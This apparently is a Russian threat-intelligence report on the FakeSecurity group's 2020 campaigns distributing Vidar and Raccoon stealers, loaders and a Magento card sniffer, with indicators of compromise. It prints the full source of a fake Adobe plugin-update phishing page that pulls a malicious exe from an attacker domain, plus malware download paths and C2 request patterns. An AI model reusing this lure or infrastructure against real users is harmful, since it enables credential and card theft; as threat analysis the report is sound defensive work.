Летом 2020 года специалисты Group-IB обратили внимание на необычную кампанию по распространению стилера Raccoon. Сам стилер хорошо известен: он умеет собирать системную информацию, данные учетных записей в браузерах, данные банковских карт, а также ищет информацию о крипто-кошельках.
Сюрприз оказался в другом. Никита Ростовцев, аналитик Group-IB Threat Intelligence & Attribution, рассказывает, как в ходе исследования удалось восстановить хронологию вредоносной кампании, установить связи с другими элементами инфраструктуры злоумышленников. Забегая вперед, отметим, что «енот» оказался прикормленным уже известной нам группой.
Начнем с того, что сам стилер Raccoon распространяется по модели Malware-As-a-Service на одном из даркнет-форумов в связке с Telegram-каналами для того, чтобы обходить блокировку актуальных C&C-серверов.
Мы разделили кампанию на четыре этапа, которые отличаются используемыми инструментами (типом вредоносного ПО, регистраторами для создания инфраструктуры и т.п.):
- Первая волна: 19 февраля — 5 марта 2020 года
- Вторая волна: 13 марта — 22 мая 2020 года
- Третья волна: 29 июня — 2 июля 2020 года
- Четвертая волна: 24 августа — 12 сентября 2020 года
Большинство доменов в рамках исследуемой кампании были зарегистрированы у двух регистраторов — Cloud2m и Host Africa. Cloud2m использовался в более ранних атаках. В середине июля 2020 года некоторые из этих доменов переехали на Host Africa.
Таймлайн вредоносных кампаний хакерской группы FakeSecurity
Мы пришли к выводу, что целью вредоносной кампании по распространению стилера была кража платежных и пользовательских данных. Для доставки вредоносного ПО злоумышленники задействовали несколько векторов атак и инструментов.
Также мы установили, что перед распространением стилера Raccoon злоумышленники в начале 2020 года работали с образцами другого стилера под названием Vidar. Для этого они использовали вложения с вредоносными макросами и фейковые веб-страницы, созданные с помощью фишинг-кита Mephistophilus.
Схема заражения жертв в кампаниях хакерской группы FakeSecurity
Схема распространения вредоносного ПО напомнила нашим экспертам паттерн, который использовали операторы семейства JS-сниффера FakeSecurity в кампании, описанной в ноябре 2019 года. Помимо сходств в инструментариях двух серий атак, они обе были нацелены на e-commerce-компании. Так, в мае 2020-го эксперты Group-IB обнаружили онлайн-магазины, которые были заражены модифицированным JS-сниффером из кампании FakeSecurity. JS-сниффер был обфусцирован при помощи aaencode, а для хранения кода и сбора украденных данных банковских карт использовались домены, которые были зарегистрированы в период активности второй волны и у тех же регистраторов, что и домены, которые мы обнаружили в исследуемой вредоносной кампании. Таким образом, за компанией по распространению стилеров, как мы считаем, стоят операторы JS-сниффера FakeSecurity.
Доменная инфраструктура вредоносных кампаний FakeSecurity
Первая волна
Первая волна регистрации доменов началась в зоне co.za 19 февраля 2020 года. Подозрительные домены содержали ключевые слова cloud, document и Microsoft. Примеры доменов, зарегистрированных в первую волну:
msupdater[.]co.za | 2020-02-19 |
documents-cloud-server[.]co.za | 2020-03-05 |
cloudupdate[.]co.za | 2020-02-21 |
В рамках первой волны кампании в качестве исходного вектора использовались рассылки с вложениями, содержащими вредоносные макросы, а также фейковые веб-страницы, ведущие на загрузку вредоносного ПО.
Документы с макросами
Уже спустя девять дней после регистрации первого домена, 28 февраля, на VirusTotal через веб-интерфейс из США был загружен файл Bank001.xlsm (SHA1: b1799345152f0f11a0a573b91093a1867d64e119):
Этот файл является документом-приманкой с вредоносными макросами, который при их активации загружает полезную нагрузку из cloudupdate.co[.]za/documents/msofficeupdate.exe.
Частично обфусцированный в Base64 вредоносный макрос группы FakeSecurity
В результате происходит выполнение файла msofficeupdate.exe (SHA1: f3498ba783b9c8c84d754af8a687d2ff189615d9). C&C-сервером данного образца является badlandsparks[.]com. Этот домен был зарегистрирован 27 февраля 2020 года и связан с IP-адресом 185.244.149[.]100. Только к этому домену производят сетевое подключение более 30 файлов.
Связанная c доменом инфраструктура, выстроенная с помощью технологии графового анализа Group-IB Threat Intelligence & Attribution
Среди таких файлов присутствуют 13b7afe8ee87977ae34734812482ca7efd62b9b6 и 596a3cb4d82e6ab4d7223be640f614b0f7bd14af. Эти файлы производят сетевое подключение одновременно к gineuter[.]info, fastandprettycleaner[.]hk и к badlandsparks[.]com. Судя по запросам, которые они выполняют для загрузки библиотек, и данным из открытых источников, файл msofficeupdate.exe и подобные ему являются образцами стилера Vidar. Этот стилер злоумышленники используют для кражи данных из браузеров, в том числе истории просмотров веб-страниц и данных учетных записей, а также данных банковских карт, файлов крипто-кошельков, переписок в мессенджерах и т.д.
Админ-панель стилера Vidar
Сетевое взаимодействие образца SHA1: 596a3cb4d82e6ab4d7223be640f614b0f7bd14af (построено с помощью графа Group-IB TI&A)
Список специфичных для Vidar HTTP-запросов, а также его подробный обзор доступен по ссылке:
/ (i.e 162) <- Config
ip-api.com/line/ <- Get Network Info
/msvcp140.dll <- Required DLL
/nss3.dll <- Required DLL
/softokn3.dll <- Required DLL
/vcruntime140.dll <- Required DLL
/ <- Pushing Victim Archive to C2
Файл BankStatement1.xlsm (SHA1: c2f8d217877b1a28e4951286d3375212f8dc2335) также является документом-приманкой с вредоносными макросами и при их активации загружает файл из download-plugin[.]co.za/documents/msofficeupdate.exe. Загружаемый файл SHA1: 430a406f2134b48908363e473dd6da11a172a7e1 также является стилером Vidar и доступен для загрузки из:
- download-plugin.co[.]za/documents/msofficeupdate.exe
- msupdater.co[.]za/documents/msofficeupdate.exe
- cloudupdate.co[.]za/documents/msofficeupdate.exe
Пример доступности файла 430a406f2134b48908363e473dd6da11a172a7e1 из разных источников
Фишинг-кит Mephistophilus
Вторым исходным вектором в рамках первой волны атак было использование фейковых веб-страниц для распространения вредоносного ПО.
Так, обнаруженные домены msupdater[.]co.za, cloudupdate[.]co.za и documents-cloud-server[.]co.za имели одинаковую А-запись — 160.119.253[.]53 — в одно и то же время. Судя по данным графового анализа Group-IB, на сайте documents-cloud-server[.]co.za находился фишинг-кит Mephistophilus.
Связанная инфраструктура указанных доменов (построено с помощью графа Group-IB TI&A)
Мы уже писали про этот фишинг-кит в нашей статье на Habr. С самого начала Mephistophilus позиционировался как система для целевых фишинговых атак. Этот фишинг-кит содержит несколько шаблонов фейковых веб-страниц для доставки полезной нагрузки, среди которых:
- онлайн-просмотрщик документов Microsoft Office 365, Word или Excel
- онлайн-просмотрщик PDF-файлов
- страница-клон сервиса YouTube
Административная панель Mephistophilus
Фейковое окно обновления Adobe Reader
На домене documents-cloud-server[.]co.za находится веб-фейк, имитирующий страницу обновления плагина для Adobe Reader. Чтобы продолжить чтение документа, пользователю требуется скачать плагин. После того как жертва кликает Download plugin, загружается вредоносный файл по ссылке www[.]documents-cloud-server[.]co.za/file_d/adobe-reader-update-10.21.01.exe.
<!DOCTYPE html>
<html>
<head>
<title>Statment00810012.pdf</title>
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
<link rel="stylesheet" href="http://www.documents-cloud-server[.]co.za/view/pdf_v3/css/style.css">
<script type="text/javascript" src="http://www.documents-cloud-server [.]co.za/view/pdf_v3/js/jquery.js"></script>
</head>
<body topmargin="0" leftmargin="0">
<div class="toolbar"></div>
<div class="layer">
<div class="tab">
<table width="100%" height="100%" cellpadding="0" cellspacing="0">
<tr>
<td class="tdo" width="307" valign="top" align="center">
<div class="logo"></div>
<br><br><br>
<div class="bottom-text" align="center">
Copyright © 2017 Adobe Systems<br> Software Ireland Ltd. <br>All rights reserved </div>
</td>
<td class="tds" width="493" valign="top" align="center">
<h2>Plugin update required</h2>
<span class="text">
This document cannot be displayed correctly<br>You are using an older version of Adobe Reader PDF Plugin<br>for Google Chrome<br>
</span>
<br><br><br>
<a class="button" data-url="http://www.documents-cloud-server[.]co.za/file_d/adobe-reader-update-10.21.01.exe">Download plugin</a>
<br><br><br><br>
<div class="bottom-text" align="center">
<a href="https://www.adobe.com/" target="_blank" class="link">Adobe</a> / <a href="https://www.adobe.com/legal/terms.html" target="_blank" class="link">Terms of Use</a> / <a href="https://www.adobe.com/privacy.html" target="_blank" class="link">Privacy</a>
</div>
</td>
</tr>
</table>
</div>
</div>
<script>
setTimeout(function(){
var width = $(window).width();
var height = $(window).height();
$('.layer').show();
$('.layer').animate({'height':height}, 1000);
setTimeout(function(){
$('.tab').show();
},1200);
},1800);
$('.button').click(function(){
$.post(location.href, {
dl:"dlPDF2",
cname:"Statement00810011"
});
var link = $(this).attr("data-url");
window.open(link);
});
$(window).resize(function(){
var width = $(window).width();
var height = $(window).height();
$('.layer').css("width",width);
$('.layer').css("height",height);
});
</script>
</body>
</html>
Исходный код фишинговой страницы
Файл с таким же именем «adobe-reader-update-10.21.01.exe» впервые был загружен на VirusTotal 13 марта 2020 года и был доступен для загрузки по следующим ссылкам:
- documents-cloud-server5[.]co.za/file_d/adobe-reader-update-10.21.01.exe
- documents-cloud-server1[.]co.za/file_d/adobe-reader-update-10.21.01.exe
- documents-cloud-server9[.]co.za/file_d/adobe-reader-update-10.21.01.exe
- documents-cloud-server8[.]co.za/file_d/adobe-reader-update-10.21.01.exe
Пример доступности файла f33c1f0930231fe6f5d0f00978188857cbb0e90d из разных источников
Другой файл — msofficeupdater.exe (SHA1: bdfefdff7b755a89d60de22309da72b82df70ecb) — был доступен по следующим путям:
- documents-cloud-server7[.]co.za/doc/msofficeupdater.exe
- documents-cloud-server5[.]co.za/doc/msofficeupdater.exe
- documents-cloud-server7[.]co.za/doc/msofficeupdater.exe
- documents-cloud-server6[.]co.za/doc/msofficeupdater.exe
- documents-cloud-server1[.]co.za/doc/msofficeupdater.exe
- documents-cloud-server6[.]co.za/doc/msofficeupdater.exe
- documents-cloud-server5[.]co.za/doc/msofficeupdater.exe
- documents-cloud-server1[.]co.za/doc/msofficeupdater.exe
Пример доступности файла bdfefdff7b755a89d60de22309da72b82df70ecb из разных источников
Вторая волна
Домены, связанные с файлом SHA1: bdfefdff7b755a89d60de22309da72b82df70ecb, вывели нас на еще одну группу доменов, относящихся к инфраструктуре злоумышленников. Эти домены были зарегистрированы в два этапа: первая группа — 13 марта 2020 года, вторая — 22 мая 2020 года.
Примеры доменов второй волны:
1 группа | 2 группа |
---|---|
cloud-server-updater[.]co.za | cloud-server-updater17[.]co.za |
cloud-server-updater1[.]co.za | cloud-server-updater18[.]co.za |
cloud-server-updater15[.]co.za | cloud-server-updater27[.]co.za |
cloud-server-updater16[.]co.za | cloud-server-updater28[.]co.za |
Эти домены были созданы для распространения стилера Raccoon. Чтобы связать данные группы доменов, можно взглянуть на файлы SHA1: b326f9a6d6087f10ef3a9f554a874243f000549d и SHA1: F2B2F74F4572BF8BD2D948B34147FFE303F92A0F. Эти файлы в процессе работы устанавливают сетевое соединение со следующими ресурсами:
- cloudupdates[.]co.za
- cloud-server-updater2[.]co.za
- cloud-server-updater19[.]co.za
Сетевое взаимодействие файла b326f9a6d6087f10ef3a9f554a874243f000549d (построено с помощью графа Group-IB TI&A)
C доменом cloudupdates[.]co.za связано порядка 50 вредоносных файлов из публичных источников. Их первые загрузки датируются 30 апреля 2020 года, а сам домен похож на найденный ранее cloudupdate.co[.]za. Кроме схожего имени домена, он зарегистрирован через регистратора cloud2m, а в качестве NS-записей у него указаны ns1.host-ww.net и ns2.host-ww.net так же, как и у msupdater[.]co.za и cloudupdate[.]co.za.
Данные из WHOIS-записей трёх доменов
Со всеми доменами второй волны связано порядка 300 файлов из публичных песочниц. Все эти файлы являются документами-приманками, содержащими вредоносные макросы, с названиями MyBankStatement_2436.xlsm, MyBankStatement_3269.xlsm, MyBankStatement_5763.xlsm и т.п.
Образец документа-приманки 6685955C5F006C2D83A92952EB5EB3FB9598C783
Один из таких файлов — MyBank_5710.xlsm (SHA1: 6685955C5F006C2D83A92952EB5EB3FB9598C783). После активации макросов в этом документе происходила загрузка файла из cloud-server-updater22[.]co.za/doc/officebuilder. Загруженный файл c SHA1: 3657CF5F2142C7E30F72E231E87518B82710DC1C является стилером Raccoon. Он подключается к своему C&C-серверу (35.228.95[.]80) для эксфильтрации собранной информации, используя инфраструктуру Google для придания легитимности запросам. В свою очередь Raccoon производит сетевое подключение к cloud-server-updater1[.]co.za/doc/officeupdate.exe для загрузки RAT AveMaria (SHA1: a10925364347bde843a1d4105dddf4a4eb88c746), C&C-сервер которого расположен на IP-адресе 102.130.118[.]152.
AveMaria RAT — это троян удаленного доступа, который был обнаружен в конце 2018 года, когда он использовался для атак на итальянскую организацию, работающую в нефтегазовом секторе. Функциональные возможности данного RAT:
- Повышение привилегий, поддержка от Windows 7 до Windows 10;
- Персистентность;
- Инжект кода;
- Кейлоггер;
- Доступ к камере;
- Управление процессами;
- Управление файлами: создание, загрузка, скачивание, удаление;
- RDP с использованием rdpwrap;
- Функция инфостилера:
- Google Chrome;
- Firefox;
- Internet Explore;
- Outlook;
- Thunderbird;
- Foxmail.
Последовательность выполнения файла 6685955C5F006C2D83A92952EB5EB3FB9598C783
Во время исполнения Raccoon выполняет следующие сетевые запросы:
Сетевые запросы файла 3657CF5F2142C7E30F72E231E87518B82710DC1C
Среди этих сетевых запросов присутствует подключение к Telegram-каналу с названием blintick.
Создатели Raccoon использовали Telegram для обхода блокировок C&C-серверов. Так, стилер выполняет запрос к Telegram-каналу, из описания которого получает зашифрованный адрес нового C&C-сервера. Первые образцы, использующие эту технику, начали появляться на VirusTotal уже в конце мая 2020 года.
Сообщение авторов стилера Raccoon
Telegram-канал blintick и его описание:
Несмотря на то, что стилер Raccoon распространяется по модели MaaS, все файлы, распространяемые в рамках второй волны, обращались к одному и тому же Telegram-каналу. Это позволяет предположить, что документы с вредоносными макросами, загружавшими Raccoon, распространялись одной и той же группой.
Третья волна
29 июня 2020 года началась регистрация доменов третьей волны:
- microsoft-cloud1[.]co.za
- microsoft-cloud6[.]co.za
- microsoft-cloud7[.]co.za
- microsoft-cloud8[.]co.za
- microsoft-cloud9[.]co.za
- microsoft-cloud10[.]co.za
- microsoft-cloud11[.]co.za
- microsoft-cloud12[.]co.za
- microsoft-cloud13[.]co.za
- microsoft-cloud14[.]co.za
- microsoft-cloud15[.]co.za
Все зарегистрированные домены указывали на IP-адрес 102.130.112[.]195. Первые вредоносные файлы, связанные с этой волной, начали появляться в публичных песочницах уже 2 июля 2020 года. Названия этих документов-приманок почти ничем не отличаются от названия файлов, рассылаемых в прошлом: BankStatement0109_13169.xlsm, My_Statement_4211.xlsm и т.д. С вышеупомянутыми доменами, а также с доменом cloud-server-updater1[.]co.za связано порядка 30 файлов:
Сетевая инфраструктура. Связь файлов с доменами двух волн
Документы-приманки этой волны выглядят идентично прошлым и, судя по их поведению после активации макросов, были созданы одним и тем же билдером. Такие билдеры позволяют создавать офисные документы с вредоносными макросами по определенным шаблонам, что помогает злоумышленникам гораздо быстрее и эффективнее распространять вредоносные файлы.
Пример документа-приманки 618C894C06633E3D7ADD228531F6E775A180A7F7
Один из анализируемых файлов, My_Statement_1953.xlsm (SHA1: 618C894C06633E3D7ADD228531F6E775A180A7F7), во время активации макросов выполняет запрос к серверу для загрузки файла из microsoft-cloud13[.]co.za/msofficeupdate.exe. Данный файл также представляет собой стилер Raccoon. Файл стилера (SHA1: 6639081791A8909F042E4A4197DF7051382B04E5) выполняет серию запросов на свой C&C-сервер 35.198.88[.]195, а также пытается загрузить файл из cloud-server-updater1[.]co.za/doc/officeupdate.exe, но получает в ответ ошибку 302 и редирект на cloud-server-updater1[.]co.za/cgi-sys/suspendedpage.cgi вследствие блокировки оригинального домена. По всей видимости, данный образец пытался загрузить RAT AVEMARIA, как и в предыдущей волне. Кроме того, все файлы данной кампании производили сетевые запросы в том числе и к вышеупомянутому Telegram-каналу telete.in/blintick.
Сетевое взаимодействие Raccoon стилера 6639081791A8909F042E4A4197DF7051382B04E5 (построено с помощью графа Group-IB TI&A)
Использование загрузчиков
В данной кампании злоумышленники также экспериментировали с различными загрузчиками. В ходе анализа инфраструктуры мы обнаружили загрузчики Buer и Smoke.
30 апреля 2020 года на VirusTotal был загружен xls-документ (SHA1: 6c6680659b09d18ccab0f933daf5bf1910168b1a). Во время исполнения вредоносного кода он загружает полезную нагрузку из cloud-server-updater2.co[.]za/doc/buer.exe.
Сетевое взаимодействие файла SHA1:6c6680659b09d18ccab0f933daf5bf1910168b1a (построено с помощью графа Group-IB TI&A)
Кроме того, эти файлы были загружены и на публичный ресурс bazaar.abuse.ch.
Название файлов и проставленные теги относят нас к Buer Loader: bazaar.abuse.ch/sample/bc96c38e3f85c43923a37f57c096eb5b3913b516dbcb11b46cb9cfd0c1d167ce/.
Сетевое взаимодействие файла SHA1:7b1a5d9bb21d852a6dbf3146fabb1cd1ca276ed9
(построено с помощью графа Group-IB TI&A)
В ходе мониторинга инфраструктуры злоумышленников мы выявили группу связанных доменов, которая была зарегистрирована в период с 24 августа по 12 сентября 2020 года. Пример таких доменов:
Domain name | Data | IP-address |
---|---|---|
code-cloud[1-6][.]co.za | 24.08.2020 | 102.130.115.44 |
google-document[.]co.za | 24.08.2020 | 102.130.115.44 |
azure-cloud[1-4][.]co.za | 4.09.2020 | 102.130.119.232 |
azure-cloud[1-3].web.za | 4.09.2020 | 102.130.119.232 |
Updateadobeonline[.]co.za | 8.09.2020 | 102.130.115.44 |
Updateforadobenew[.]co.za | 9.09.2020 | 102.130.118.209 |
Oneupdateadobe[1-4][.]co.za | 9.09.2020 | 102.130.118.209 |
Updateadobe[.]co.za | 12.09.2020 | 102.130.121.74 |
Схожие WHOIS-записи доменов
WHOIS-записи этих доменов совпадают с WHOIS-записями доменов, ранее замеченных в этой кампании. Уже 26 августа 2020 года на публичных ресурсах начали появляться вредоносные файлы, связанные с доменами code-cloud[1-6][.]co.za и google-document[.]co.za. Один из таких файлов — BankStatement_1390868739.doc (SHA1: ed5c20371bae393df0a713be72220b055e5cbdad).
Сетевое взаимодействие файла SHA1: ed5c20371bae393df0a713be72220b055e5cbdad (построено с помощью графа Group-IB TI&A)
В процессе выполнения вредоносного кода этот файл загружает полезную нагрузку из google-document[.]co.za/doc/loader.exe. Сигнатурный анализ показал, что загружаемый файл является образцом Smoke Loader.
Анализ файла loader.exe и проставленный тег Smoke loader
То, что киберпреступники в своих кампаниях дополнительно используют загрузчики, может говорить о том, что группа все еще находится в поисках лучших инструментов для себя.
Четвертая волна
Часть доменов, зарегистрированных в начале сентября 2020 года, мимикрировала под Adobe в своих названиях. Уже начиная с 14 сентября 2020 года на этих хостах, как и в первой волне, был обнаружен Mephistophilus с идентичным шаблоном.
Связь между Mephistophilus-инфраструктурой кампаний 2019 и 2020 года
Скриншот страницы-приманки Mephistophilus
Нажатие на кнопку Download plugin приводит к загрузке файла SHA1: bcfb45e5451435530156f1f02ddbb9cadf6338e9 из updateforadobenew[.]co.za/file_d/adobe-reader-v13.11.1.3.exe, который является стилером Raccoon.
Результат анализа вредоносного файла из модуля Polygon комплексной системы Group-IB Threat Hunting Framework
Создание матрицы анализируемого файла
Примечание: Примерно в середине июля 2020 года, злоумышленники удалили свой Telegram-канал. Он был восстановлен 14 сентября 2020 года и в описании также содержал зашифрованный адрес актуального C&C-сервера. На момент написания данного исследования канал вновь неактивен.
Содержимое Telegram-канала blintick
Связь с FakeSecurity
Данная вредоносная кампания имеет явное сходство с серией атак с использованием семейства JS-снифферов FakeSecurity, описанной экспертами Group-IB в ноябре 2019 года. Жертвами прошлых атак стали владельцы сайтов онлайн-магазинов, работающих на CMS Magento. В описанной ранее кампании злоумышленники также использовали такие инструменты, как стилер Vidar и фиш-кит Mephistophilus с идентичным шаблоном под обновления для Adobe. Кроме того, в обеих кампаниях злоумышленники регистрировали домены на одних и тех же хостингах.
В кампании 2020 года мы видим использование такого же вектора атак с последующим распространением стилера Raccoon. Кроме того, в ходе исследования этой кампании мы обнаружили письма, отправленные нескольким онлайн-магазинам с email-адресов bezco.quise1988@wp.pl и outtia.lene1985@wp.pl.
При детальном исследовании первой волны распространения вредоносных программ через веб-фейки Mephistophilus мы обнаружили связь между доменами этой кампании, в частности documents-cloud-server*[.]co.za, и кампанией FakeSecurity. В кампании 2020 года веб-фейки были доступны по следующим URL:
Список доменов с идентичной структурой
Согласно ресурсу urlscan[.]io, с похожей структурой было доступно порядка 20 сайтов. Среди них выделяется alloaypparel[.]com. Этот домен использовался в кампании FakeSecurity.
С марта 2020 года специалисты Group-IB начали детектировать заражения онлайн-магазинов JS-сниффером, обфусцированным при помощи алгоритма aaencode (https://utf-8.jp/public/aaencode.html). Вредоносный код подгружался с домена get-js[.]com. Домен get-js[.]com имел WHOIS-записи, схожие с ранее использованными доменами этой группы:
- fiswedbesign[.]com
- alloaypparel[.]com
- firstofbanks[.]com
- magento-security[.]org
- mage-security[.]org
Связь между инфраструктурой группы FakeSecutiry кампании 2019 года и доменом get-js[.]com
Фрагмент кода JS-сниффера, обфусцированного при помощи алгоритма aaencode
После снятия обфускации мы определили, что используемый для заражений вредоносный код — это модифицированная версия сниффера FakeSecurity, который мы анализировали в ноябре 2019 года.
Деобфусцированный код модифицированной версии сниффера FakeSecurity
В мае 2020 года специалисты Group-IB обнаружили новые заражения сайтов онлайн-магазинов. В ходе этой кампании снова использовался модифицированный сниффер FakeSecurity, обфусцированный при помощи aaencode. Вредоносный код внедрялся либо по ссылке при помощи тега script, либо путем модификации существующих JavaScript-файлов сайта. С помощью этого сниффера был скомпрометирован 21 онлайн-магазин. Для хранения кода и сбора украденных данных банковских карт в ходе новой кампании использовались следующие домены:
- cloud-js[.]co.za
- host-js[.]co.za
- magento-cloud[.]co.za
- magento-js[.]co.za
- magento-security[.]co.za
- marketplace-magento[.]co.za
- marketplacemagento[.]co.za
- node-js[.]co.za
- node-js[.]co.za
- payment-js[.]co.za
- security-js[.]co.za
- web-js[.]co.za
Дата их создания — 24 апреля 2020 года (вторая волна). Эти домены были зарегистрированы у тех же регистраторов, что и домены, использовавшиеся для распространения стилеров Vidar, Raccoon, а также загрузчиков Buer и Smoke.
Формат ссылок на файлы JS-снифферов, а также используемое семейство вредоносного кода позволяют предположить, что за кампанией по заражению сайтов онлайн-магазинов стоят операторы семейства JS-снифферов FakeSecurity.
Кроме того, некоторые домены исследуемой кампании хостили страницу заглушки с надписью test page — похожая страница заглушки хостится и на доменах FakeSecurity:
- urlscan.io/result/0299b3e5-cbba-40be-adce-7ba437e4cb39/ microsoft-cloud10[.]co.za
- urlscan.io/result/8f244d1b-2186-4db5-9c52-6122584dafa9/ — documents-cloud-server[.]co.za
Варианты схожих заглушек «test page» на гейтах FakeSecurity и исследуемых доменах co.za
Обнаруженные параллели свидетельствуют о том, что за описанной выше многоступенчатой вредоносной кампанией вероятнее всего стоят операторы семейства JS-снифферов FakeSecurity. По нашим данным, хоть группа и использует для получения первоначального доступа инструменты не своей разработки, которые продаются или сдаются в аренду на даркнет-форумах, она продолжает использовать свой уникальный JS-сниффер.
Рекомендации
Для того, чтобы проверить свои системы защиты на готовность к отражению атак, описанных в нашем блоге, мы приводим матрицу MITRE ATT&CK и MITRE Shield. Все эти технологии защиты реализованы в новом классе решений Group-IB для исследования киберугроз и охоты за атакующими. При возникновении вопросов или подозрений на инцидент обращайтесь на response@cert-gib.com.
Tactics | Techniques of adversaries | Mitigations & Active Defense Techniques | Group-IB mitigation & protection products |
---|---|---|---|
Reconnaissance | T1595 — Active Scanning T1583. Acquire Infrastructure |
M1016. Vulnerability Scanning | Security Assessment |
Initial Access | T1566 — Phishing T1190 — Exploit Public-Facing Application |
M1049. Antivirus/Antimalware M1031. Network Intrusion Prevention M1021. Restrict Web-Based Content M1017. User Training M1050. Exploit Protection M1051. Update Software M1027. Password Policies DTE0035. User Training DTE0019. Email Manipulation DTE0027. Network Monitoring |
Threat Hunting Framework Threat Intelligence & Attribution Cyber Education Red Teaming |
Execution | T1059. Command and Scripting Interpreter T1204. User Execution T1059.007. JavaScript/JScript |
M1049. Antivirus/Antimalware M1038. Execution Prevention M1021. Restrict Web-Based Content M1026. Privileged Account Management DTE0035. User Training DTE0021. Hunting DTE0018. Detonate Malware DTE0007. Behavioral Analytics DTE0003. API Monitoring DTE0034. System Activity Monitoring |
Threat Hunting Framework Red Teaming Incident Response Fraud Hunting Platform |
Defense Evasion | T1036. Masquerading T1027. Obfuscated Files or Information |
||
Credential Access | T1056. Input Capture |
M1049. Antivirus/Antimalware DTE0007. Behavioral Analytics DTE0003. API Monitoring DTE0034. System Activity Monitoring |
Threat Hunting Framework |
Collection | |||
Command and Control | T1219. Remote Access Software | M1038. Execution Prevention M1031. Network Intrusion Prevention DTE0021. Hunting DTE0022. Isolation DTE0027. Network Monitoring DTE0003. API Monitoring DTE0034. System Activity Monitoring DTE0031. Protocol Decoder |
Threat Hunting Framework |
Exfiltration | T1041. Exfiltration Over C2 Channel |
P.S. Автор выражает благодарность Виктору Окорокову, аналитику Group-IB Threat Intelligence & Attribution, за помощь в подготовке данной публикации.
P.P.S. Если ты, также как и мы считаешь, что зло в любом цифровом обличии должно быть наказано, залетай посмотреть наши актуальные вакансии в департаменте Threat Intelligence & Attribution. Group-IB — это новое поколение инженеров, воплощающих смелые инновационные идеи предотвращения кибератак, основанные на технологиях хантинга, слежения за атакующими, их тактикой, инструментами и инфраструктурой. Ежедневно мы боремся с международной киберпреступностью, создавая продукты и сервисы, способные защитить людей, бизнес и государства во всем мире. И если твои скилы могут пригодиться для того, чтобы создавать новые решения, пилить крутые интерфейсы, то у нас есть огромное количество вакансий в департаменте разработки. Присоединяйся!
Индикаторы
TG not mal | telete[.]in/blintick 8623aq9z046whQWysOHRvL9zM/GAADZbWXUG4TKc3D8n3r00X34-v70 73309q9z046whQWytOHdtItzM+WEADZfJFUetXe10DMG+8VUP7A==26-v30 |
Raccoon | cloud-server-updater[.]co.za cloud-server-updater1[.]co.za cloud-server-updater2[.]co.za cloud-server-updater3[.]co.za cloud-server-updater4[.]co.za cloud-server-updater5[.]co.za cloud-server-updater6[.]co.za cloud-server-updater7[.]co.za cloud-server-updater8[.]co.za cloud-server-updater9[.]co.za cloud-server-updater10[.]co.za cloud-server-updater11[.]co.za cloud-server-updater12[.]co.za cloud-server-updater13[.]co.za cloud-server-updater14[.]co.za cloud-server-updater15[.]co.za cloud-server-updater16[.]co.za cloud-server-updater17[.]co.za cloud-server-updater18[.]co.za cloud-server-updater19[.]co.za cloud-server-updater20[.]co.za cloud-server-updater21[.]co.za cloud-server-updater22[.]co.za cloud-server-updater23[.]co.za cloud-server-updater24[.]co.za cloud-server-updater25[.]co.za cloud-server-updater26[.]co.za cloud-server-updater27[.]co.za cloud-server-updater28[.]co.za 35.228.95[.]80 35.198.88[.]195 34.105.255[.]170 102.130.113[.]55 34.105.219[.]83 oneupdateadobe[.]co.za oneupdateadobe2[.]co.za oneupdateadobe3[.]co.za oneupdateadobe4[.]co.za updateforadobenew[.]co.za oneupdateadobe[.]org.za oneupdateadobe2[.]org.za oneupdateadobe3[.]org.za microsoft-cloud1[.]co.za microsoft-cloud6[.]co.za microsoft-cloud7[.]co.za microsoft-cloud8[.]co.za microsoft-cloud9[.]co.za microsoft-cloud10[.]co.za microsoft-cloud11[.]co.za microsoft-cloud12[.]co.za microsoft-cloud13[.]co.za microsoft-cloud14[.]co.za microsoft-cloud15[.]co.za cloudupdates[.]co.za |
FakeSecurity | cloud-js[.]co.za host-js[.]co.za magento-cloud[.]co.za magento-js[.]co.za magento-security[.]co.za marketplace-magento[.]co.za marketplacemagento[.]co.za node-js[.]co.za node-js[.]co.za payment-js[.]co.za security-js[.]co.za web-js[.]co.za |
Mephistophilus | documents-cloud-server1[.]co.za documents-cloud-server2[.]co.za documents-cloud-server3[.]co.za documents-cloud-server4[.]co.za documents-cloud-server6[.]co.za documents-cloud-server7[.]co.za documents-cloud-server8[.]co.za documents-cloud-server9[.]co.za documents-cloud-server[.]co.za oneupdateadobe[.]co.za oneupdateadobe2[.]co.za oneupdateadobe3[.]co.za oneupdateadobe4[.]co.za updateforadobenew[.]co.za oneupdateadobe[.]org.za oneupdateadobe2.[.]org.za oneupdateadobe3[.]org.za oneupdateadobe3[.]com |
Vidar | badlandsparks[.]com gineuter[.]info paunsaugunt[.]com precambrianera[.]com biscayneinn[.]com msupdater[.]co.za cloudupdate[.]co.za cloudupdates[.]co.za securitycloudserver[.]co.za fastandprettycleaner[.]hk download-plugin[.]co.za download-plugins[.]co.za downloadplugins[.]co.za |
Другие индикаторы | code-cloud1[.]co.za code-cloud2[.]co.za code-cloud3[.]co.za code-cloud4[.]co.za code-cloud5[.]co.za code-cloud6[.]co.za google-document[.]co.za azure-cloud1[.]co.za azure-cloud2[.]co.za azure-cloud3[.]co.za azure-cloud4[.]co.za azure-cloud1[.]web.za azure-cloud2[.]web.za azure-cloud3[.]web.za Updateadobeonline[.]co.za |
adsensei
Если честно, то читать всё это неинтересно. Было только интересно, как вирус запускается на устройстве жертвы. И как я понял сначала скачивается exe-шник, а потом что? Его запуск не требуется?